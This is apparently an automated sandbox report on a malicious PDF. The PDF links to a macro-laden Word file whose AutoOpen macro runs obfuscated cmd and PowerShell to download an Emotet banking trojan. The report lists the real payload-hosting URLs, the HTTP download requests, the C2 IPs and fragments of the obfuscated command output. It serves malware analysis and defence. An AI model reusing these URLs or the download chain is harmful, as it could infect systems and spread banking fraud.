Analysis Report DOC-642857352.pdf

Overview

General Information

Joe Sandbox Version:	24.0.0 Fire Opal
Analysis ID:	724300
Start date:	27.11.2018
Start time:	13:58:27
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DOC-642857352.pdf
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.bank.expl.evad.winPDF@28/35@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 76 Number of non-executed functions: 120
Cookbook Comments:	Adjust boot time Found application associated with file extension: .pdf Found PDF document Find and activate links Security Warning found Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	88	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample might require command line arguments, analyze it with the command line cookbook

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts1	Command-Line Interface11	Valid Accounts1	Valid Accounts1	Valid Accounts1	Credential Dumping	Process Discovery2	Application Deployment Software	Data from Local System	Data Encrypted1	Standard Cryptographic Protocol2
Replication Through Removable Media	Service Execution1	Modify Existing Service1	Process Injection1	Disabling Security Tools1	Network Sniffing	Security Software Discovery31	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Non-Application Layer Protocol3
Drive-by Compromise	PowerShell3	New Service2	New Service2	Process Injection1	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Application Layer Protocol3
Exploit Public-Facing Application	Scripting11	System Firmware	DLL Search Order Hijacking	Deobfuscate/Decode Files or Information1	Credentials in Files	System Service Discovery1	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication
Spearphishing Link	Exploitation for Client Execution24	Shortcut Modification	File System Permissions Weakness	Scripting11	Account Manipulation	File and Directory Discovery1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	Obfuscated Files or Information2	Brute Force	System Information Discovery32	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212406 CryptDuplicateHash,	19_2_00212406
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212466 CryptEncrypt,CryptDestroyHash,	19_2_00212466
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212496 CryptDestroyHash,	19_2_00212496
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002124F6 CryptDuplicateHash,CryptDecrypt,CryptDestroyHash,	19_2_002124F6
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212595 CryptVerifySignatureW,CryptDestroyHash,	19_2_00212595
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212279 CryptExportKey,	19_2_00212279
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002122F5 CryptAcquireContextW,	19_2_002122F5
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002122C9 CryptGetHashParam,	19_2_002122C9
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212335 CryptImportKey,LocalFree,CryptReleaseContext,	19_2_00212335
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212314 CryptReleaseContext,	19_2_00212314
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002123B7 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	19_2_002123B7
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00212399 CryptGenKey,CryptDestroyKey,CryptReleaseContext,	19_2_00212399

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Potential document exploit detected (performs DNS queries with low reputation score)

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

DNS query: name: avrasyaorganizasyon.net

Potential browser exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: avrasyaorganizasyon.net

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.83:49201 -> 89.19.30.15:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.83:49201 -> 89.19.30.15:80

Networking:

Connects to country known for bullet proof hosters

Show sources

Source: unknown

Network traffic detected: IP: 89.19.30.15 Turkey

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS

Downloads files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /5087642DQPJSQC/BIZ/US HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: avrasyaorganizasyon.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5087642DQPJSQC/BIZ/US/ HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: avrasyaorganizasyon.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /my1fugwV HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sphinx-tour.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /my1fugwV/ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sphinx-tour.comConnection: Keep-Alive

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: avrasyaorganizasyon.net

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: HTTP/1.1 200 OKExpires: Tue, 01 Jan 1970 00:00:00 GMTLast-Modified: Tue, 27 Nov 2018 13:00:20 GMTCache-Control: no-store, no-cache, must-revalidate, max-age=0Cache-Control: post-check=0, pre-check=0Pragma: no-cacheContent-Type: application/mswordContent-Disposition: attachment; filename="PAYMENT #223848OEIWWWS.doc"Content-Transfer-Encoding: binaryDate: Tue, 27 Nov 2018 13:00:20 GMTAccept-Ranges: bytesServer: LiteSpeedConnection: Keep-AliveVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 46 30 30 20 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 58 09 58 93 c7 d6 9e b0 86 b0 23 20 20 48 58 43 10 12 d9 04 59 8b 16 59 2c 9b 20 88 52 14 c2 07 04 c8 42 12 08 11 10 2b 8a 15 5c d9 b4 60 41 a1 b8 54 10 a8 a2 02 2a 15 14 b7 2a 2e 20 2a b5 1a b5 0a 5a 20 b1 88 6c 92 3b 1f 90 5b cb d5 a7 ed bd fd 9f ff ff ef e3 9b bc 73 66 39 73 e6 9c 39 93 65 be 1b ed aa 8f f6 d7 e9 f0 c1 0c b8 02 49 30 21 92 03 32 e2 0e 08 09 c8 d8 e9 3a 50 01 20 1e 0a 0c e4 84 48 24 42 bb 62 20 d7

Urls found in memory or binary data

Show sources

Source: ~DF813EEAC87A33DE9B.TMP.7.dr	String found in binary or memory: http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US
Source: DOC-642857352.pdf	String found in binary or memory: http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US)
Source: {6C5EA244-F244-11E8-A8F7-B808CF8DE4F2}.dat.7.dr	String found in binary or memory: http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/USRoot
Source: rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp	String found in binary or memory: http://egyptecotours.com/Aaw5tZ
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://egyptecotours.com/Aaw5tZH
Source: OSPPSVC.EXE, 0000000E.00000002.1072190378.003D8000.00000004.sdmp	String found in binary or memory: http://licensing.micr
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://nowley-rus.ru/adminisH
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://nowley-rus.ru/administrator/cache/tg
Source: rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp, rsh.exe, 00000013.00000003.1064024692.002FE000.00000004.sdmp	String found in binary or memory: http://nowley-rus.ru/administrator/cache/tguHgQZ
Source: powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	String found in binary or memory: http://nowley-rus.ru/administrator/cache/tguHgQZH
Source: powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	String found in binary or memory: http://nowley-rus.ru/administrator/cache/tguHgQZt
Source: UserCache.bin.2.dr	String found in binary or memory: http://recentfiles.
Source: UserCache.bin.2.dr	String found in binary or memory: http://recentfiles.com.adobe.acrobat.extensions.files_description
Source: powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	String found in binary or memory: http://secretariaextension.uH
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://secretariaextension.unt.edu.ar/wp-coH
Source: powershell.exe, 0000000F.00000002.1052722629.00285000.00000004.sdmp	String found in binary or memory: http://secretariaextension.unt.edu.ar/wp-content/
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://secretariaextension.unt.edu.ar/wp-content/00002/l24
Source: rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp	String found in binary or memory: http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4IH
Source: powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	String found in binary or memory: http://secretariaextension.unt.edu.ar/wp-content/00002/l24wot
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fuH
Source: rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwV
Source: powershell.exe, 0000000F.00000002.1060797524.04430000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwV$
Source: powershell.exe, 0000000F.00000002.1060978581.04549000.00000004.sdmp, powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp, my1fugwV[1].htm.15.dr	String found in binary or memory: http://sphinx-tour.com/my1fugwV/
Source: powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwV/0k
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwVH
Source: powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwVV
Source: powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwV_
Source: powershell.exe, 0000000F.00000002.1052722629.00285000.00000004.sdmp	String found in binary or memory: http://sphinx-tour.com/my1fugwVr
Source: powershell.exe, 0000000F.00000002.1050888827.001B0000.00000004.sdmp	String found in binary or memory: http://venturemeets.com/Ge
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://venturemeets.com/GeQH
Source: rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp, rsh.exe, 00000013.00000003.1064024692.002FE000.00000004.sdmp	String found in binary or memory: http://venturemeets.com/GeQdV4
Source: powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	String found in binary or memory: http://venturemeets.com/GeQdV4H
Source: US[1].htm.8.dr	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: OSPPSVC.EXE, 0000000E.00000002.1072190378.003D8000.00000004.sdmp	String found in binary or memory: http://www.microsoft.co

E-Banking Fraud:

Detected Emotet e-Banking trojan

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_0021D119		19_2_0021D119
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003ED119		21_2_003ED119

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 19_2_00212335 CryptImportKey,LocalFree,CryptReleaseContext,

19_2_00212335

System Summary:

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 107.180.48.109 80

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\rsh.exe

Jump to dropped file

Contains functionality to call native functions

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_001F1FF0 memcpy,NtAllocateVirtualMemory,	18_2_001F1FF0
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_001F1EE0 memcpy,NtProtectVirtualMemory,	18_2_001F1EE0
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_001F1FF0 memcpy,NtAllocateVirtualMemory,	19_2_001F1FF0
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_001F1EE0 memcpy,NtProtectVirtualMemory,	19_2_001F1EE0
Source: C:\Windows\System32\echoshims.exe	Code function: 20_2_00181FF0 memcpy,NtAllocateVirtualMemory,	20_2_00181FF0
Source: C:\Windows\System32\echoshims.exe	Code function: 20_2_00181EE0 memcpy,NtProtectVirtualMemory,	20_2_00181EE0
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003C1FF0 memcpy,NtAllocateVirtualMemory,	21_2_003C1FF0
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003C1EE0 memcpy,NtProtectVirtualMemory,	21_2_003C1EE0

Contains functionality to delete services

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 19_2_0021F8B0 _snwprintf,OpenServiceW,DeleteService,CloseServiceHandle,

19_2_0021F8B0

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 19_2_0021210D CreateProcessAsUserW,

19_2_0021210D

Creates mutexes

Show sources

Source: C:\Windows\System32\echoshims.exe	Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Mutant created: \Sessions\2\BaseNamedObjects\PEM668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: no name
Source: C:\Windows\System32\echoshims.exe	Mutant created: \BaseNamedObjects\PEME80
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Mutant created: \Sessions\2\BaseNamedObjects\PEMA38
Source: C:\Windows\System32\echoshims.exe	Mutant created: \BaseNamedObjects\PEM194
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\M3C4E0000
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\I3C4E0000

Detected potential crypto function

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_002156EF	18_2_002156EF
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_002156EF	18_2_002156EF
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002156EF	19_2_002156EF
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_002156EF	19_2_002156EF
Source: C:\Windows\System32\echoshims.exe	Code function: 20_2_005456EF	20_2_005456EF
Source: C:\Windows\System32\echoshims.exe	Code function: 20_2_005456EF	20_2_005456EF
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003E56EF	21_2_003E56EF
Source: C:\Windows\System32\echoshims.exe	Code function: 21_2_003E56EF	21_2_003E56EF

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: PAYMENT _223848OEIWWWS[1].doc.8.dr	OLE, VBA macro line: Sub AutoOpen()
Source: PAYMENT _223848OEIWWWS.doc.3sjibq6.partial.8.dr	OLE, VBA macro line: Sub AutoOpen()

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: String function: 00211D10 appears 32 times

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Classification label

Show sources

Source: classification engine

Classification label: mal88.bank.expl.evad.winPDF@28/35@4/2

Clickable URLs found in PDF

Show sources

Source: DOC-642857352.pdf	Initial sample: http://avrasyaorganizasyon.net/5087642dqpjsqc/biz/us
Source: DOC-642857352.pdf	Initial sample: http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US

Contains functionality to create services

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: _snwprintf,CreateServiceW,CloseServiceHandle,

19_2_0021F959

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 18_2_00211C10 CreateToolhelp32Snapshot,

18_2_00211C10

Contains functionality to modify services (start/stop/modify)

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 19_2_0021F9F1 StartServiceW,CloseServiceHandle,CloseServiceHandle,

19_2_0021F9F1

Creates files inside the user directory

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.dat

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\FAP4E75.tmp

Jump to behavior

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...y&..........................C\.w&=.w..2...0...0.P.0...o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..2.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....&............................2..@..`.2..~3.`...`.....*u..2................J0.0.
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.6.0.1.,.1.!. ...............2..@..`.2..~3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....&..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....&...........................&........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................6.0.1. .E.Q.U. .0. ..&..............................\....&................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..&....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .".!.j.t.C.:.*.j.t.C.!.=.!.". . .................................o.......o.....l..."....E.J....d...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....&..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....&............................3...0...3.....H.3...0...o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..2.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....&............................2..@..`.2.X.3.`...`.....*u..2................J....
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.6.0.0.,.1.!. ...............2..@..`.2.X.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....&..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....&...........................&........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................6.0.0. .E.Q.U. .0. ..&..............................\....&................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..&....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....&..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....&..........................s.k.t.o.p.>.@..J..2.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....&............................2..@..`.2.8.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.9.,.1.!. ...............2..@..`.2.8.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....'..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....'...........................'........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.9. .E.Q.U. .0. ..'..............................\....'................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..'....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...)'..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...0'..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..2.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...<'............................2..@..`.2...3.`...`.....*u..2.........,..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.8.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...H'..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...N'..........................H'........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.8. .E.Q.U. .0. .T'..............................\...N'................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.Z'....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...f'..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...m'..........................s.k.t.o.p.>.@..J..2.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...y'............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.7.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....'..................................,.................o.4............F.J........
